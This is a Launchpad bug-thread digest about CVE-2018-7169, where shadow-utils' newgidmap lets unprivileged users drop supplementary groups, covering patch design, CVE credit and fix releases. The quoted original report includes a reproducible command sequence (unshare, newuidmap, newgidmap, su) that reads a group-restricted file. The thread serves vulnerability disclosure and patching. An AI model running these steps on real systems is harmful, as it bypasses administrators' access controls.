[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Bug Watch Updater]

** Changed in: shadow (openSUSE)
   Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Serge Hallyn]

@stgraber @mdeslaur - I'd considered making a release for Ubuntu...  but
this is the negative acl thing...  Your opinions appreciated.

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

https://github.com/shadow-maint/shadow/pull/99 includes the
allow_setgroups/deny_setgroups feature that we discussed earlier.

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Bug Watch Updater]

Launchpad has imported 5 comments from the remote bug at
https://bugzilla.opensuse.org/show_bug.cgi?id=1081294.

If you reply to an imported comment from within Launchpad, your comment
will be sent to the remote bug automatically. Read more about
Launchpad's inter-bugtracker facilities at
https://help.launchpad.net/InterBugTracking.


On 2018-02-16T08:33:35+00:00 Kbabioch-b wrote:

CVE-2018-7169

An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and
allows an unprivileged user to be placed in a user namespace where setgroups(2)
is permitted. This allows an attacker to remove themselves from a supplementary
group, which may allow access to certain filesystem paths if the administrator
has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths.
This flaw effectively reverts a security feature in the kernel (in particular,
the /proc/self/setgroups knob) to prevent this sort of privilege escalation.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7169
http://www.cvedetails.com/cve/CVE-2018-7169/
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357

Reply at:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/comments/26


On 2018-02-16T08:38:46+00:00 Kbabioch-b wrote:

SUSE:SLE-12:Update is not affected, since newgidmap was only introduced
with 4.2.1. We still ship 4.1.5.1.

Reply at:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/comments/27


On 2018-02-16T08:49:09+00:00 Kbabioch-b wrote:

Fixed for Factory: sr#577189

Reply at:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/comments/28


On 2018-02-16T10:34:16+00:00 Mvetter wrote:

Thanks for adding the patch.
SR accepted. Forwarded to Factory as SR#577204.

Reply at:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/comments/29


On 2018-02-16T15:03:45+00:00 Kbabioch-b wrote:

Didn't realize that we backported this feature to our SLE12 codestream.
Applied the patch there, too: sr#155145

Reply at:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/comments/30


** Changed in: shadow (openSUSE)
   Status: Unknown => Confirmed

** Changed in: shadow (openSUSE)
   Importance: Unknown => Medium

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

** Bug watch added: bugzilla.opensuse.org/ #1081294
   https://bugzilla.opensuse.org/show_bug.cgi?id=1081294

** Changed in: shadow (openSUSE)
   Importance: Undecided => Unknown

** Changed in: shadow (openSUSE)
   Status: New => Unknown

** Changed in: shadow (openSUSE)
 Remote watch: None => bugzilla.opensuse.org/ #1081294

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

CVE-2018-7169 is assigned for this issue.

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-7169

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

** Also affects: shadow (openSUSE)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

https://github.com/shadow-maint/shadow/pull/97 is my proposed patch. It
currently only deals with the immediate security issue of allowing users
that don't have

  % echo "$(whoami):$(id -g):1" >> /etc/setgid

... set up. I've tested this with a couple of different setups and it
appears to preserve behaviour when you're mapping subgid'd groups, but
it restricts setgroups if the mapping is a fallback one. I was working
on a patch for the flags code, but there's a lot of magic in the parsing
code for that -- so I will work on that separately.

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Craig Furman]

It's really not a problem, I'm happy to leave it as it is.

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

Re: [Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

On Thu, Feb 15, 2018 at 11:30 PM, Craig Furman
<1729...@bugs.launchpad.net> wrote:
> Thanks for the credit! I did highlight that the bug was in newgidmap in
> my initial report, by the way.

No problem -- you found the issue after all. Sorry for getting the timeline
wrong, did you want me to change the credits at all? It's your call.

> Aleksa, thanks for asking for a CVE? How did you go about this? This is
> new territory to me.

You just submit the online form at https://cveform.mitre.org/. You can also go
through the project if the project is registered with MITRE. (Canonical is
registered for example, but since this bug affects all distributions and not
just Ubuntu I felt it made more sense to just submit directly.)

There didn't appear to be any way for me to add you to Cc in the form (I could
only provide a single contact address), but I can forward the mails to you.

-- 
Aleksa Sarai (cyphar)
www.cyphar.com

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Craig Furman]

Thanks for the credit! I did highlight that the bug was in newgidmap in
my initial report, by the way.

Aleksa, thanks for asking for a CVE? How did you go about this? This is
new territory to me.

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

Re: [Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

Yes, of course. "Craig Furman (Pivotal)" is in the credits. I also
added Akihiro Suda (for suggesting him that it was a newgidmap bug)
and myself (for working on a fix for it), but if Craig prefers I can
just make him the only credit.

On Thu, Feb 15, 2018 at 11:00 PM, Christian Brauner
 wrote:
> On Thu, Feb 15, 2018 at 11:29:03AM -, Aleksa Sarai wrote:
>> I've just sent a request for a CVE. I'm working on the patch now. My
>
> I assume the CVE will at least be correctly attributed to Craig.
>
> Christian
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1729357
>
> Title:
>   unprivileged user can drop supplementary groups
>
> Status in shadow package in Ubuntu:
>   Confirmed
>
> Bug description:
>   Distribution: Ubuntu 16.04.3 LTS
>   Kernel: 4.4.0-97-generic
>   uidmap package version: 1:4.2-3.1ubuntu5.3
>
>   The newgidmap setuid executable allows any user to write a single
>   mapping line to the gid_map of a process whose identity is the same as
>   the calling process, as long as that mapping line maps the process's
>   own GID outside of the user namespace to GID 0 inside the user
>   namespace.
>
>   Newgidmap will write the mapping regardless of the content of
>   /proc/$process_being_mapped/setgroups, which will initially contain
>   the string "allow". After this mapping is performed, and also after
>   the process' uid_map is written with newuidmap, the process in the
>   user namespace will be able to use the setgroups system call to drop
>   supplementary groups.
>
>   This is possible even if there is no entry for the user in
>   /etc/subgid, because no subordinate GIDs are actually being used.
>
>   This allows any user to circumvent the use of supplementary groups as
>   blacklists, e.g. for some file owned by root:blacklist with permission
>   bits 0604 (octal). Normally any process whose identity included the
>   group "blacklist" in its supplementary groups would not be able to
>   read that file. By performing this exploit using newgidmap, they can
>   drop all supplementary groups and read that file.
>
>   If newgidmap was not available, unprivileged users would not be able
>   to write a process's gid_map until writing "deny" to
>   /proc/$pid/setgroups. A fix for this might be for newgidmap to check
>   the content of /proc/$process_being_mapped/setgroups is "deny", but we
>   have not tried to patch this ourselves.
>
>   An example using 2 login shells for a user named "someone" on Ubuntu
>   Xenial, with the uidmap package installed:
>
>   Shell 1
>
>   someone@ubuntu-xenial:~$ id
>   uid=1001(someone) gid=1001(someone) groups=1001(someone),1002(restricted)
>
>   someone@ubuntu-xenial:~$ ls -al /tmp/should_restrict
>   -rwr-- 1 root restricted 8 Nov  1 12:23 /tmp/should_restrict
>
>   someone@ubuntu-xenial:~$ cat /tmp/should_restrict
>   cat: /tmp/should_restrict: Permission denied
>
>   someone@ubuntu-xenial:~$ unshare -U --setgroups allow #
>   /proc/self/setgroups already contains 'allow', but let's be explicit
>
>   nobody@ubuntu-xenial:~$ echo $$
>   1878
>
>   Shell 2
>
>   someone@ubuntu-xenial:~$ cat /etc/subuid
>   lxd:10:65536
>   root:10:65536
>   ubuntu:165536:65536
>
>   someone@ubuntu-xenial:~$ cat /etc/subgid
>   lxd:10:65536
>   root:10:65536
>   ubuntu:165536:65536
>
>   # There are no entries in /etc/sub{u,g}id for someone, but this
>   doesn't matter that much as subordinate IDs are not being requested.
>
>   someone@ubuntu-xenial:~$ newuidmap 1878 0 1001 1
>
>   someone@ubuntu-xenial:~$ newgidmap 1878 0 1001 1
>
>   Back to shell 1
>
>   nobody@ubuntu-xenial:~$ id
>   uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
>
>   # The presence of the "nogroup" supplementary group indicates that
>   some unmapped GIDs are present as supplementary GIDs. The kernel knows
>   that this process still has "restricted" in its supplementary groups,
>   so it can't read the restricted file yet.
>
>   nobody@ubuntu-xenial:~$ cat /tmp/should_restrict
>   cat: /tmp/should_restrict: Permission denied
>
>   # The process has gained CAP_SETGID in its user namespace by becoming
>   UID 0. /proc/$pid/setgroups contains "allow", so it can call
>   setgroups(2). By su-ing to root (itself, in the user namespace), it
>   can drop the supplementary groups. It can't read /root/.bashrc as that
>   file is owned by UID 0 in the initial user namespace, which creates
>   some distracting error output but doesn't matter in this case.
>
>   nobody@ubuntu-xenial:~$ su root
>   su: Authentication failure
>   (Ignored)
>   bash: /root/.bashrc: Permission denied
>
>   # Supplementary groups have been dropped
>
>   root@ubuntu-xenial:~# id
>   uid=0(root) gid=0(root) groups=0(root)
>
>   # It can read the restricted file
>
>   root@ubuntu-xenial:~# cat /tmp/should_restrict
>   content
>
> To manage notifications about this bug go to:
> 

Re: [Bug 1729357] Re: unprivileged user can drop supplementary groups

[Christian Brauner]

On Thu, Feb 15, 2018 at 11:29:03AM -, Aleksa Sarai wrote:
> I've just sent a request for a CVE. I'm working on the patch now. My

I assume the CVE will at least be correctly attributed to Craig.

Christian

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

I've just sent a request for a CVE. I'm working on the patch now. My
current plan is that allow_setgroups will be the default for all
mappings that are present in /etc/subgid -- but any "implicit" mappings
(like mapping your own group) will be deny_setgroups by default (because
that's the biggest security issue coming out of this bug -- that *any*
user can drop groups, not just the ones with subgids set up).

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

I had a preliminary patch written, but it was getting quite complicated
(shadow's codebase is much more complicated than I expected -- and the
/etc/subgid parsing code is intertwined with the parsing code for all of
the other /etc/... files). I am working on it though.

I've also email the SUSE Security team about getting a CVE assigned,
though I'm not sure if it's better that we get it assigned or that the
Ubuntu folks get it assigned.

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Akihiro Suda]

@cyphar

Did you submit patch/CVE?

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

Serge: I will submit a patch later today. However, I just thought that
it's probably better that "allow_setgroups" should be "ignore_setgroups"
and we retain the current behaviour (we don't write anything to
/proc/$pid/setgroups) -- which allows a user (or runtime) to explicitly
disable setgroups even if they would normally have the right to use
setgroups.

Does that sound okay to you? I will make the default ignore_setgroups,
but IMO we should change the default for `useradd` to (by default) set
deny_setgroups.

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

Oh, and we should definitely get a CVE assigned IMO.

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

Re: [Bug 1729357] Re: unprivileged user can drop supplementary groups

[Serge Hallyn]

This sounds acceptable to me.  Issues or (even better) PRs against
github.com/shadow-maint/shadow would be great :)

Indeed the default should be the more permissible.  (I won't accept
patches which require changes to the container runtime.)


On Mon, Jan 15, 2018 at 9:13 AM, Akihiro Suda  wrote:
>> And we define flags "allow_setgroups" and "deny_setgrouops" (with
> "deny_setgroups" being the default).
>
>
> I think allow_setgropus should be the default for keeping compatibility.
>
> However, useradd(8) may print warning for the default configuration.
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1729357
>
> Title:
>   unprivileged user can drop supplementary groups
>
> Status in shadow package in Ubuntu:
>   Confirmed
>
> Bug description:
>   Distribution: Ubuntu 16.04.3 LTS
>   Kernel: 4.4.0-97-generic
>   uidmap package version: 1:4.2-3.1ubuntu5.3
>
>   The newgidmap setuid executable allows any user to write a single
>   mapping line to the gid_map of a process whose identity is the same as
>   the calling process, as long as that mapping line maps the process's
>   own GID outside of the user namespace to GID 0 inside the user
>   namespace.
>
>   Newgidmap will write the mapping regardless of the content of
>   /proc/$process_being_mapped/setgroups, which will initially contain
>   the string "allow". After this mapping is performed, and also after
>   the process' uid_map is written with newuidmap, the process in the
>   user namespace will be able to use the setgroups system call to drop
>   supplementary groups.
>
>   This is possible even if there is no entry for the user in
>   /etc/subgid, because no subordinate GIDs are actually being used.
>
>   This allows any user to circumvent the use of supplementary groups as
>   blacklists, e.g. for some file owned by root:blacklist with permission
>   bits 0604 (octal). Normally any process whose identity included the
>   group "blacklist" in its supplementary groups would not be able to
>   read that file. By performing this exploit using newgidmap, they can
>   drop all supplementary groups and read that file.
>
>   If newgidmap was not available, unprivileged users would not be able
>   to write a process's gid_map until writing "deny" to
>   /proc/$pid/setgroups. A fix for this might be for newgidmap to check
>   the content of /proc/$process_being_mapped/setgroups is "deny", but we
>   have not tried to patch this ourselves.
>
>   An example using 2 login shells for a user named "someone" on Ubuntu
>   Xenial, with the uidmap package installed:
>
>   Shell 1
>
>   someone@ubuntu-xenial:~$ id
>   uid=1001(someone) gid=1001(someone) groups=1001(someone),1002(restricted)
>
>   someone@ubuntu-xenial:~$ ls -al /tmp/should_restrict
>   -rwr-- 1 root restricted 8 Nov  1 12:23 /tmp/should_restrict
>
>   someone@ubuntu-xenial:~$ cat /tmp/should_restrict
>   cat: /tmp/should_restrict: Permission denied
>
>   someone@ubuntu-xenial:~$ unshare -U --setgroups allow #
>   /proc/self/setgroups already contains 'allow', but let's be explicit
>
>   nobody@ubuntu-xenial:~$ echo $$
>   1878
>
>   Shell 2
>
>   someone@ubuntu-xenial:~$ cat /etc/subuid
>   lxd:10:65536
>   root:10:65536
>   ubuntu:165536:65536
>
>   someone@ubuntu-xenial:~$ cat /etc/subgid
>   lxd:10:65536
>   root:10:65536
>   ubuntu:165536:65536
>
>   # There are no entries in /etc/sub{u,g}id for someone, but this
>   doesn't matter that much as subordinate IDs are not being requested.
>
>   someone@ubuntu-xenial:~$ newuidmap 1878 0 1001 1
>
>   someone@ubuntu-xenial:~$ newgidmap 1878 0 1001 1
>
>   Back to shell 1
>
>   nobody@ubuntu-xenial:~$ id
>   uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
>
>   # The presence of the "nogroup" supplementary group indicates that
>   some unmapped GIDs are present as supplementary GIDs. The kernel knows
>   that this process still has "restricted" in its supplementary groups,
>   so it can't read the restricted file yet.
>
>   nobody@ubuntu-xenial:~$ cat /tmp/should_restrict
>   cat: /tmp/should_restrict: Permission denied
>
>   # The process has gained CAP_SETGID in its user namespace by becoming
>   UID 0. /proc/$pid/setgroups contains "allow", so it can call
>   setgroups(2). By su-ing to root (itself, in the user namespace), it
>   can drop the supplementary groups. It can't read /root/.bashrc as that
>   file is owned by UID 0 in the initial user namespace, which creates
>   some distracting error output but doesn't matter in this case.
>
>   nobody@ubuntu-xenial:~$ su root
>   su: Authentication failure
>   (Ignored)
>   bash: /root/.bashrc: Permission denied
>
>   # Supplementary groups have been dropped
>
>   root@ubuntu-xenial:~# id
>   uid=0(root) gid=0(root) groups=0(root)
>
>   # It can read the restricted file
>
>   root@ubuntu-xenial:~# cat /tmp/should_restrict
>   content
>
> To manage notifications about this bug go 

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Akihiro Suda]

> And we define flags "allow_setgroups" and "deny_setgrouops" (with
"deny_setgroups" being the default).


I think allow_setgropus should be the default for keeping compatibility.

However, useradd(8) may print warning for the default configuration.

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Aleksa Sarai]

> Thanks for replying Eric, but I'm having trouble reproducing what you've
> posted. I can't write the gid map until I've written deny to
> /prod/$pid/setgroups, not the other way around. There might be some nuance
> I've missed.

Yes, this is a security feature. setgroups must be written to *before* gid_map
(the reason for this is explained further in user_namespaces(7)). And only
privileged users are allowed to write to gid_map if setgroups is set to allow.

> Also, newgidmap will allow a user to map their own GID to 0 in the user
> namespace, even when there is no entry for that user in /etc/subgid.

This is something that is generally required for a container to function, and
isn't fundamentally a security issue because users are already allowed to do
that without privileges (this is how rootless containers and LXC unprivileged
containers work) -- *unless* in this mode newgidmap is setting setgroups=allow
(in which case this is a major security problem).

> What if newgidmap wrote "deny" to /proc/$pid/setgroups unless the user is
> whitelisted in some config file, probably separate from /etc/subgid, as
> Stéphane suggested?

:+1: I'd prefer if we implemented this by changing the /etc/subgid schema so
that rather than having the format

   user:id:id_cnt

It has the format

   user:id:id_cnt[:flagA,flagB,...]

And we define flags "allow_setgroups" and "deny_setgrouops" (with
"deny_setgroups" being the default). This way, administrators can be *explicit*
about the denial, we don't add any new configuration files, and it's backwards
compatible (with security being opt-out).

I imagine making deny_setgroups might be a *bit* contentious, but in the worst
case we could have a migration script that asks users (or just add a document
about it to the logfile for the upgrade).

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Craig Furman]

Thanks for replying Eric, but I'm having trouble reproducing what you've
posted. I can't write the gid map until I've written deny to
/prod/$pid/setgroups, not the other way around. There might be some
nuance I've missed.

Also, newgidmap will allow a user to map their own GID to 0 in the user
namespace, even when there is no entry for that user in /etc/subgid.

What if newgidmap wrote "deny" to /proc/$pid/setgroups unless the user
is whitelisted in some config file, probably separate from /etc/subgid,
as Stéphane suggested?

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1729357] Re: unprivileged user can drop supplementary groups

[Seth Arnold]

Eric W. Biederman contributed this via email:

> The short answer is that if you want negative acls to work don't try and
> apply them to a user in /etc/subuid or /etc/subgid.
> 
> To my knowledge there is not a good solution to this problem.
> 
> As for setting setgroups to deny that is the default setting if you do
> nothing.  Allow can't be set until the gid map is set.  Plus there
> are some inheritence rules that ensure if your parent has deny set you
> always will have deny set.
> 
> To date in my experience negative group acls are a theoretical construct
> that no one actually uses.

Given that there's no clear solution to this problem I'm going to make
this bug public, so others can know that subtracting permissions via group
membership isn't perfect.

Thanks


** Information type changed from Private Security to Public Security

** Changed in: shadow (Ubuntu)
   Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs